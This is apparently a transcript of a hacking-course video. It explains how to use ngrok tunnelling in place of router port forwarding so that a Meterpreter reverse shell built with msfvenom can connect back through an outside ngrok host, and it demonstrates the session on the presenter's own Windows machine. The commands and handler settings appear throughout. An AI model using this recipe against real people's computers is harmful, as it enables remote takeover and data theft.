Hello everybody and welcome back. And right now, before we continue, I just want to show you an alternative to the port forwarding attack. Well, basically, the attack over the Internet. Now let's say, for example, you are on a cafe Wi-Fi and you do not have access to the router, and you, for example, want to port forward, or actually be able to attack anyone in the entire world over a link, or something like that. You can't really perform the port forwarding since you do not have access to the router, so you need to have an alternative for that. Now the alternative is a program called ngrok. Now ngrok, I don't think it comes pre-installed in Kali Linux. We will not be installing it since it is only optional. I already have it installed on my laptop. If you want to, you can just go into your Firefox and just search "installing ngrok commands", or something like that, and I believe it is rather easy to install. You would probably need to make an account on the website in order for this to work, but I believe you will do that very easily, since I don't remember having any problem during the installation of this program. So, you just search "ngrok download", and then you can actually find it somewhere. Either on their GitHub, as we can see right here, or you can go on to their official website and actually download it from there.
Now this is also something you can run on both Linux and Windows, so that's good to know as well. So once you download that, you will probably have an account. And once you do that, just type here ngrok --help. I believe it has help options. Okay, so it does have --help. And basically what you want to do is actually perform port forwarding with this tool, on their website. So what they allow you to do is have an open port on their website. When someone connects to their website over some open port, that will forward the connection straight to you. So their website actually acts as a router in that case, as a port forwarder for our own machine. As we can see in some of the examples right here, "ngrok http 80, # secure public URL for port 80 web server". So if you were, for example, to run this, you would be able to give access to your Apache 2 web server to anyone in the world, to anyone that actually types the link with your open port. Now you might be asking, well, isn't that the same as hosting, and how does this come for free? Well, the free version actually changes your port every time you restart ngrok, so you will not be able to have a static address for this. But you can pay for, I believe, the professional version, or something like that, where they actually allow you to have the same port every time you run ngrok.
But right now what we want to do is actually type ngrok tcp, and then we want to use the port that we want to forward on our Kali Linux machine, or basically on my laptop in this case. So let's just say port 5555. And then when we run this, you will see that it will actually try to connect to their web server, and soon enough, I believe, it will give us an open port on their website. So, reconnecting... it will give you some of these timeout sessions. But don't worry, I believe in a few seconds this will perform a full connection to their website. So let's wait for that to happen. And here we are, we can see that we are currently online. So, the few things that we have right here are the session status, which is the status of our current web server, or not web server, our open port. The account that I made when I was setting up ngrok was this one. As we can see it is plan 3, which means I do not have the premium version. Update available, doesn't matter. The version, the region, United States. The forwarding is done on this link right here. So this is the link, and this is the port that they use in order to forward your connection. So it is forwarding it to our localhost at port 5555. So, with this you do not need to actually port forward anything in the router.
You can just bring your laptop anywhere and perform the attack over the entire Internet. But right now there are also a few things that you need to change while running this. So, let's open another terminal right here, and let me change my directory to the Desktop directory. Now let's say we want to make a payload, and we want to make that payload connect back to us. So what we want to do is msfvenom -p, and let's create a simple windows/meterpreter/reverse_tcp. And now in the LHOST you would want to specify this. So you would want to specify this link right here, so 0.tcp.ngrok.io. Now I believe that link will be the same for everyone, so you just specify that link. And what that will do is, when the target that you send this file to runs this, it will connect to their website on this port. So you need to set the local host to be 0.tcp.ngrok.io, and the local port to be the port that they give us. So, 14583 in my case, so 14583. Now let me just enlarge this a little bit, so zoom in. And after this, what you want to specify is the same as before. So you can use an encoder if you want to, but I will not use one in this case. So file exe, and we put that into shell.exe. This will create a simple Windows meterpreter reverse shell for us that will perform a connection to their website on this port.
Now what that website will do then is forward that connection to our localhost, which is 0.0.0.0 on port 5555. Now it means that actually it will forward it to all interfaces, I believe, so you will be able to receive the connection. There are also some things that you need to change in the msfconsole as well. So I will show you that right now. First of all, what you want to do is become root. And then copy this shell.exe into /var/www/html/ so I can download it on my Windows 10 machine. So let's do that as well. Now, while I do that, I will run msfconsole here. So we leave this open, and then I will show you what you need to specify in order for this to actually work. So the simple thing you need to do is basically the same as before, so you need to type here use exploit/multi/handler. Once you do that, you basically just need to set the payload as the payload that you used, so in my case it is windows/meterpreter/reverse_tcp. Now here, as we show options right here, you want to set the LHOST to be 0.0.0.0, and you want the LPORT to be 5555, since that is the LPORT that we specified in the ngrok command. So set LPORT to be 5555. After you do all of that, you should be good to go. So I will just run my shell.exe on my Windows 10 machine. Let me just find where I saved it.
While I do that, I will just run this exploit -j -z so it runs in the background. Right now I will run my shell.exe. It will ask me if I want to run it, since I actually downloaded it from Apache 2. Whoops, let me just scroll this back down. I want to click more info, run anyway, and we can see that I got the meterpreter session opened. So we were actually able to connect, or basically to hack a remote target that is actually across the globe. Now my Windows 10 machine isn't really across the globe, but this will work wherever that machine was, since we actually made that machine connect back to this link right here, which is a publicly available link. If I go right here on my Firefox, as we can see right here, sessions, sessions -i 1. If I getuid, you will see that this is my Windows 10 machine. So we can close this since we don't need to do anything anymore, and let me close this terminal as well. And if we use this link right here and copy it, you will see that there actually is a connection to that link. If I were to, for example, set up a listener and paste this right here, the listener would be able to, it would actually perform a meterpreter shell opening. But the shell won't really work, there is no payload on this website.
Now it says the connection was reset because we are not really listening for any connections at the moment, so we can't actually go to the page. So, that would be about it for this ngrok tutorial. It is an alternative to port forwarding if you are, for example, not doing the over-the-Internet attacks over your own network, with your own router. So you can use this in order to perform a simple port forward with the ngrok website. So, hope you enjoyed this video and hope I see you in the next one. Bye!